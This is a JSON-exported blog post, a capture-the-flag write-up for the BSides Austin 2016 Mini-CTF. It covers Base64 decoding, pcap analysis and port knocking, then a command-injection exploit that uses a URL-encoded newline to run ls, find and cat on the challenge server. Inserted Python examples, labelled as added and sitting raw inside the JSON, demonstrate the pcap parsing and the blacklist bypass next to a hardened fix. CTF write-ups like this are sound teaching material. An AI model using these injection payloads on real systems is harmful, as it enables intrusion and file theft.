{"id":650,"date":"2016-04-04T11:34:32","date_gmt":"2016-04-04T16:34:32","guid":{"rendered":"http:\/\/www.webadminblog.com\/?p=650"},"modified":"2016-04-04T11:45:32","modified_gmt":"2016-04-04T16:45:32","slug":"completing-the-bsides-austin-2016-mini-ctf","status":"publish","type":"post","link":"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/","title":{"rendered":"Completing the BSides Austin 2016 Mini-CTF"},"content":{"rendered":"<p>The BSides Austin 2016 Mini-CTF began with the back of the badge. \u00a0There was a large QR code which took a very long time for me to scan with my phone, and when I finally got it, it was just the numbers\u00a0\u201c07263584\u201d. \u00a0Not very useful. \u00a0Below that, however, there was a string of letters and numbers as follows:<\/p>\n<p style=\"padding-left: 30px;\"><em>aHR0cDovL2N0Zi5ic2lkZXNhdXN0aW4ub3JnL2xldmVsMS8=<\/em><\/p>\n<div>The string, with its Base64 alphabet and trailing \u201c=\u201d padding, very obviously looked like Base64, so I decoded it to get the following URL:<\/div>\n<p style=\"padding-left: 30px;\"><a href=\"http:\/\/ctf.bsidesaustin.org\/level1\/\">http:\/\/ctf.bsidesaustin.org\/level1\/<\/a><\/p>\n<div>On that page it reads:<\/div>\n<p style=\"padding-left: 30px;\">That start was easy! You have shown that you are curious and that is the key. As your reward, you may have this:<br \/>\nflag 1: BSides{D3c0d3s_R_3Z}<br \/>\nDo you want to play some more? If so, read on&#8230;<\/p>\n<p style=\"padding-left: 30px;\">1. Turn in flags by sending an email to <a href=\"mailto:bsidesaustin@gmail.com\">bsidesaustin@gmail.com<\/a>. The email must contain your name, email address, and the flag you are turning in.<\/p>\n<p style=\"padding-left: 30px;\">2. There are three flags total; each should be submitted via email.<\/p>\n<p style=\"padding-left: 30px;\">3. Do not scan this server with automated tools. They are not necessary and could cause performance issues. If you scan this server, you could be disqualified.<\/p>\n<p style=\"padding-left: 30px;\">4. Send in flag 1 then click <a href=\"http:\/\/ctf.bsidesaustin.org\/level2\/9slfowiuwer98987987kljsdfljsdf\/\">here<\/a> to continue&#8230;<\/p>\n<div>I submitted the flag and moved on to the next page at:<\/div>\n<p style=\"padding-left: 30px;\"><a href=\"http:\/\/ctf.bsidesaustin.org\/level2\/9slfowiuwer98987987kljsdfljsdf\/\">http:\/\/ctf.bsidesaustin.org\/level2\/9slfowiuwer98987987kljsdfljsdf\/<\/a><\/p>\n<div>On that page there was a file named coms.pcap. \u00a0Given the pcap extension, I loaded it into Wireshark. \u00a0It was a 1113-packet capture containing encrypted Google traffic, YouTube rickrolls, and more. \u00a0Only a handful of the packets were addressed to 45.32.195.232, the IP address of ctf.bsidesaustin.org. \u00a0Following the TCP stream showed a request for <a href=\"http:\/\/ctf.bsidesaustin.org:31337\/level3\/index.html\">http:\/\/ctf.bsidesaustin.org:31337\/level3\/index.html<\/a>. \u00a0When I went to that URL, however, it was as if nothing was listening on port 31337. \u00a0Eventually, I filtered the pcap by that IP as the destination (ip.dst == 45.32.195.232 in Wireshark) and found a sequence of connection attempts to unusual ports on that host, in order: 1025, 2300, 1337, 1337.
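<div>Pulling that port sequence out of a capture does not need Wireshark. What follows is an added example, not code from the original write-up: a small pcap reader in Python that lists, in capture order, the destination ports of TCP SYNs sent to a given host. The capture it parses is constructed inline (the target address is the one above; the client address, source ports and timestamps are made up), and it handles only classic pcap files with Ethernet frames, rejecting pcapng rather than misreading it.<\/div>

```python
# Added example (not code from the original write-up): a minimal libpcap reader
# that recovers, in capture order, the destination ports of TCP SYNs sent to a
# host. The sample capture below is constructed inline; the target address is
# the one named in the post, the client address and timestamps are made up.
import socket
import struct

PCAP_MAGIC = 0xA1B2C3D4      # classic libpcap format, microsecond timestamps
LINKTYPE_ETHERNET = 1
SYN, ACK = 0x02, 0x10

TARGET = '45.32.195.232'     # ctf.bsidesaustin.org, per the write-up
CLIENT = '10.0.0.5'          # constructed client address


def _frame(src, dst, sport, dport, flags):
    '''Build one Ethernet/IPv4/TCP frame. Checksums stay zero: nothing is sent.'''
    tcp = struct.pack('!HHIIHHHH', sport, dport, 0, 0, (5 << 12) | flags, 8192, 0, 0)
    ip = struct.pack('!BBHHHBBH4s4s', 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    eth = bytes(12) + struct.pack('!H', 0x0800)   # zero MACs, EtherType IPv4
    return eth + ip + tcp


def sample_capture():
    '''Constructed capture: the level2 download, unrelated traffic, the knocks,
    and the eventual connection to 31337.'''
    frames = [
        _frame(CLIENT, TARGET, 50001, 80, SYN),
        _frame(TARGET, CLIENT, 80, 50001, SYN | ACK),   # reply, not a knock
        _frame(CLIENT, '8.8.8.8', 50002, 443, SYN),     # other host, ignored
        _frame(CLIENT, TARGET, 50003, 1025, SYN),
        _frame(CLIENT, TARGET, 50004, 2300, SYN),
        _frame(CLIENT, TARGET, 50005, 1337, SYN),
        _frame(CLIENT, TARGET, 50006, 1337, SYN),
        _frame(CLIENT, TARGET, 50007, 31337, SYN),
        _frame(CLIENT, TARGET, 50007, 31337, ACK),      # established, not a knock
    ]
    out = struct.pack('<IHHiIII', PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, f in enumerate(frames):
        out += struct.pack('<IIII', 1459700000 + i, 0, len(f), len(f)) + f
    return out


def syn_ports_to(pcap, target_ip):
    '''Destination ports of TCP SYN (not SYN/ACK) packets addressed to target_ip,
    in capture order. Handles both byte orders of the classic pcap header;
    pcapng and non-Ethernet link types are rejected rather than misparsed.'''
    magic, = struct.unpack('<I', pcap[:4])
    if magic == PCAP_MAGIC:
        end = '<'
    elif magic == 0xD4C3B2A1:
        end = '>'
    else:
        raise ValueError('not a classic pcap file')
    linktype, = struct.unpack(end + 'I', pcap[20:24])
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError('only Ethernet captures are handled')
    target = socket.inet_aton(target_ip)
    ports, off = [], 24
    while off + 16 <= len(pcap):
        _sec, _usec, incl_len, _orig_len = struct.unpack(end + 'IIII', pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or struct.unpack('!H', frame[12:14])[0] != 0x0800:
            continue                                    # not IPv4
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != 6 or ip[16:20] != target or len(ip) < ihl + 14:
            continue                                    # not TCP to the target
        tcp = ip[ihl:]
        dport, = struct.unpack('!H', tcp[2:4])
        flags = struct.unpack('!H', tcp[12:14])[0] & 0x1FF
        if flags & SYN and not flags & ACK:
            ports.append(dport)
    return ports


if __name__ == '__main__':
    print(syn_ports_to(sample_capture(), TARGET))      # [80, 1025, 2300, 1337, 1337, 31337]
```

<div>Against the real file, pass the bytes of coms.pcap to syn_ports_to with the same target address. Keeping only SYNs without ACK drops the server replies and the later data packets, which is why a plain destination-IP filter in Wireshark shows more rows than the knock itself.<\/div>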
\u00a0This smelled suspiciously of port knocking, so I wrote a quick bash one-liner using nmap to test it:<\/div>\n<p style=\"padding-left: 30px;\">for x in 1025 2300 1337; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 45.32.195.232; done<\/p>\n<div>-Pn skips host discovery and --max-retries 0 sends a single probe per port, so the only packets the target sees are the knocks, in order.<\/div>\n<div>Finally, I hit the page on port 31337:<\/div>\n<p style=\"padding-left: 30px;\"><a href=\"http:\/\/ctf.bsidesaustin.org:31337\/level3\/index.html\">http:\/\/ctf.bsidesaustin.org:31337\/level3\/index.html<\/a><\/p>\n<div>Sure enough, now I got a response that said:<\/div>\n<p style=\"padding-left: 30px;\">Congratulations, you have completed the second challenge!<br \/>\nThe second flag is: BSidesAustin{C4rV1NG_UP_PC4Ps}<\/p>\n<p style=\"padding-left: 30px;\">Click <a href=\"http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\">here<\/a> to continue to the final challenge!<\/p>\n<div>I submitted the flag and moved on to the next page at:<\/div>\n<p style=\"padding-left: 30px;\"><a href=\"http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\">http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu<\/a><\/p>\n<div>On this page there is a network interface test where you can enter an IP as a ping destination; pressing \u201cEnter\u201d returns the output of the ping:<\/div>\n<p style=\"padding-left: 30px;\">PING\u00a0127.0.0.1\u00a0(127.0.0.1)\u00a056(84)\u00a0bytes\u00a0of\u00a0data.<br \/>\n64\u00a0bytes\u00a0from\u00a0127.0.0.1:\u00a0icmp_seq=1\u00a0ttl=64\u00a0time=0.026\u00a0ms<br \/>\n---\u00a0127.0.0.1\u00a0ping\u00a0statistics\u00a0---<br \/>\n1\u00a0packets\u00a0transmitted,\u00a01\u00a0received,\u00a00%\u00a0packet\u00a0loss,\u00a0time\u00a00ms<\/p>\n<p style=\"padding-left: 
30px;\">rtt\u00a0min\/avg\/max\/mdev\u00a0=\u00a00.026\/0.026\/0.026\/0.000\u00a0ms<\/p>\n<div>Entering something that was not an IP address, I got a message like:<\/div>\n<p style=\"padding-left: 30px;\">Error\u00a0running\u00a0ping\u00a0-c\u00a01\u00a0127.0.0.1<\/p>\n<div>So there is some filtering on the input, but the error message also shows the shape of the command being run (ping -c 1 followed by a destination), which suggested that some of the input was reaching a shell. \u00a0I found that I could supply the destination as a GET parameter instead of the POST by adding \u201c?dest=127.0.0.1\u201d to the URL, and that worked.\u00a0 I tried a number of combinations of \u201c;\u201d, \u201c&amp;&amp;\u201d, and other shell separators that would chain a command onto the existing one, with no luck. \u00a0Eventually, I found that \u201c%0A\u201d, the URL-encoded ASCII line feed, was not filtered; since the shell treats a newline as a command separator just like \u201c;\u201d, I could use it to run further commands. \u00a0For example:<\/div>\n<p style=\"padding-left: 30px;\"><a href=\"http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\/index.cgi?dest=127.0.0.1%0Als\">http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\/index.cgi?dest=127.0.0.1%0Als<\/a><\/p>\n<div>Returned a listing of \u201cindex.cgi\u201d and \u201cthe\u201d in that directory. \u00a0Then:<\/div>\n<p style=\"padding-left: 30px;\"><a href=\"http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\/index.cgi?dest=127.0.0.1%0Afind\">http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\/index.cgi?dest=127.0.0.1%0Afind<\/a><\/p>\n<div>Showed (find with no arguments lists the current directory tree recursively) that \u201cthe\u201d was the top of a directory tree ending in \u201c.\/the\/roof\/the\/roof\/the\/roof\/is\/on\/fire\/flag.txt\u201d. \u00a0Sweet! \u00a0I found the flag!
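<div>The filter weakness in code, as an added example that is not code from the challenge or from this write-up: a Python model of the level3 form that applies a character blacklist and then runs through sh -c, beside a hardened version that parses the destination as an IP address and runs ping with an argument list and no shell. The blacklist, the command string and the use of echo in place of ping are assumptions made so that it runs offline; nothing is known about the real filter beyond what the challenge showed. The demo goes one step past the listing above and also reads a file with input redirection (cat&lt;file), so the second command needs no space.<\/div>

```python
# Added example (not code from the original write-up): the newline bypass from
# the level3 ping form, beside a hardened version. The blacklist, the exact
# command string and the 'echo PING' stand-in for ping are assumptions so the
# demo runs offline; the real CGI's filter is not known beyond what the post shows.
import ipaddress
import os
import subprocess
import tempfile

BLOCKED = set(';&|`$(){} ')   # assumed blacklist: the separators the post says failed


def naive_filter_accepts(dest):
    '''Blacklist check in the style of the vulnerable form: it rejects the usual
    shell metacharacters but not a bare newline, which sh also treats as a
    command separator (the %0A in the write-up, once URL-decoded).'''
    return not any(c in BLOCKED for c in dest)


def shell_command_for(dest, base='ping -c 1'):
    '''The string the CGI hands to sh -c (the error message in the post shows
    the command shape: ping -c 1 followed by the destination).'''
    return base + ' ' + dest


def run_via_shell(command):
    '''Execute through /bin/sh -c, exactly the mistake the CGI makes; returns stdout.'''
    return subprocess.run(['sh', '-c', command], capture_output=True, text=True).stdout


def demo_flag_read():
    '''Plant a constructed flag file, then read it the way the write-up does:
    a newline to start a second command, and input redirection (cat<file) so
    the payload needs no space. 'echo PING' replaces ping so that this runs
    without network access or raw-socket privileges.'''
    with tempfile.NamedTemporaryFile('w', suffix='.txt', delete=False) as f:
        f.write('BSidesAustin{constructed_flag}' + '\n')
        path = f.name
    try:
        payload = '127.0.0.1' + '\n' + 'cat<' + path
        if not naive_filter_accepts(payload):
            raise RuntimeError('blacklist unexpectedly caught the payload')
        return run_via_shell(shell_command_for(payload, base='echo PING'))
    finally:
        os.unlink(path)


def validated_ping_argv(dest):
    '''Hardened form: parse dest as an IP address (allow-list by type, not a
    blacklist) and pass it as one argv element with no shell in between, so
    separators of any kind are impossible. The -c 1 precedes the address, and an
    IP literal cannot begin with a dash, so argument injection is excluded too.
    Raises ValueError on anything that is not an address.'''
    return ['ping', '-c', '1', str(ipaddress.ip_address(dest.strip()))]


def is_safe_dest(dest):
    '''True when validated_ping_argv would accept dest.'''
    try:
        validated_ping_argv(dest)
        return True
    except ValueError:
        return False


if __name__ == '__main__':
    print(demo_flag_read())
```

<div>demo_flag_read returns the echoed ping line followed by the planted flag, showing that the blacklist never saw anything it objects to. The hardened path rejects the same payload with a ValueError before anything runs, and because the destination is an argv element rather than part of a command string, even a character the blacklist forgot has nowhere to go.<\/div>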
\u00a0Now to open it. \u00a0The \u201c%3C\u201d is a URL-encoded \u201c&lt;\u201d, so cat reads the file through input redirection rather than as an argument, and the payload needs no space between the command and the path:<\/div>\n<p style=\"padding-left: 30px;\"><a href=\"http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\/index.cgi?dest=127.0.0.1%0Acat%3C.\/the\/roof\/the\/roof\/the\/roof\/is\/on\/fire\/flag.txt\">http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\/index.cgi?dest=127.0.0.1%0Acat%3C.\/the\/roof\/the\/roof\/the\/roof\/is\/on\/fire\/flag.txt<\/a><\/p>\n<div>That returned:<\/div>\n<p style=\"padding-left: 30px;\">PING\u00a0127.0.0.1\u00a0(127.0.0.1)\u00a056(84)\u00a0bytes\u00a0of\u00a0data.<br \/>\n64\u00a0bytes\u00a0from\u00a0127.0.0.1:\u00a0icmp_seq=1\u00a0ttl=64\u00a0time=0.026\u00a0ms<br \/>\n---\u00a0127.0.0.1\u00a0ping\u00a0statistics\u00a0---<br \/>\n1\u00a0packets\u00a0transmitted,\u00a01\u00a0received,\u00a00%\u00a0packet\u00a0loss,\u00a0time\u00a00ms<br \/>\nrtt\u00a0min\/avg\/max\/mdev\u00a0=\u00a00.026\/0.026\/0.026\/0.000\u00a0ms<br \/>\nGreat\u00a0job!\u00a0The\u00a0third\u00a0and\u00a0final\u00a0flag\u00a0is:\u00a0BSidesAustin{F1lt3rs_R_Fun}<\/p>\n<p style=\"padding-left: 30px;\">Congratulations,\u00a0you\u00a0have\u00a0completed\u00a0the\u00a0challenge!<\/p>\n<div>Final flag submitted. \u00a0Game over!<\/div>\n","protected":false},"excerpt":{"rendered":"<p>The BSides Austin 2016 Mini-CTF began with the back of the badge. \u00a0There was a large QR code which took a very long time for me to scan with my phone, and when I finally got it, it was just the numbers\u00a0\u201c07263584\u201d. \u00a0Not very useful.
\u00a0Below that, however, there was \u00a0a string of letters and [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[645,517],"tags":[646,423,521,518,519,648,647],"class_list":["post-650","post","type-post","status-publish","format-standard","hentry","category-bsides-austin-2016","category-capture-the-flag","tag-646","tag-austin","tag-bsides","tag-capture","tag-flag","tag-mini-ctf","tag-the"],"aioseo_notices":[],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/pfI0c-au","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/posts\/650","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/comments?post=650"}],"version-history":[{"count":8,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/posts\/650\/revisions"}],"predecessor-version":[{"id":658,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/posts\/650\/revi
sions\/658"}],"wp:attachment":[{"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/media?parent=650"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/categories?post=650"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/tags?post=650"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}